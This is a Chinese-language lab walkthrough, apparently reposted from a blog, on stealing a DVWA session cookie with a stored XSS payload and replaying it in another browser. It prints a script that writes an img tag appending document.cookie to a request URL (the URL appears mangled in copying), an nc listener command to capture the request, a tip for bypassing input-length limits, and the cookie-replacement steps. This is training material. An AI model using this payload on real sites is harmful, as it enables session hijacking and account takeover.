環境
系統:windows 7
靶場:DVWA
場景:chrome對firefox的個人cookie盜用偽造
IP:192.168.98.128
埠:未占用的任意埠 [1024-49151]
實施
1.首先確保firefox登錄狀態,即存在cookie
2.構造獲取cookie的js請求腳本
<script> document.write( '<img src="https://www.cnblogs.com/Wizo-WLsecTeam/archive/2023/06/13/url'+ document.cookie+ '"/>' //利用img標簽特性,生成src的GET請求并獲取請求頁面cookie,然后作為圖片去展示; ); //通過document.write寫到網頁中來-執行img標簽-去觸發指令-生成一個含cookie的GET請求 </script> //因為src=https://www.cnblogs.com/Wizo-WLsecTeam/archive/2023/06/13/“”中引號內容只會作為資料字串進行展示,所以需引進script腳本去執行document.cookie,對標簽和執行內容進行‘單引號’分隔和【資料+指令+資料】的拼接
原理:構造一個訪問請求來盜取瀏覽器頁面的cookie
3.提交執行腳本
在任意輸入框進行提交,注意繞過前端輸入長度限制
4.進行nc埠監聽
nc -lp 8011
注:此處須保持與構造請求的埠一致!!
5.替換cookie實作偽造盜用
- 1.打開chrome瀏覽器訪問DVWA
- 2.找到頁面cookie資訊
- 3.進行cookie值的替換
6.實作登錄
此處并不是直接重繪頁面,因為其登錄頁面是固定的,我們要通過cookie的盜用直接獲取其登錄狀態,因此此處訪問的應該是首頁
http://127.0.0.1:8082
可以看到成功進入DVWA的頁面,攻擊完成,
TRANSLATE with| Arabic | Hebrew | Polish |
| Bulgarian | Hindi | Portuguese |
| Catalan | Hmong Daw | Romanian |
| Chinese Simplified | Hungarian | Russian |
| Chinese Traditional | Indonesian | Slovak |
| Czech | Italian | Slovenian |
| Danish | Japanese | Spanish |
| Dutch | Klingon | Swedish |
| English | Korean | Thai |
| Estonian | Latvian | Turkish |
| Finnish | Lithuanian | Ukrainian |
| French | Malay | Urdu |
| German | Maltese | Vietnamese |
| Greek | Norwegian | Welsh |
| Haitian Creole | Persian |
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/555101.html
標籤:其他
下一篇:返回列表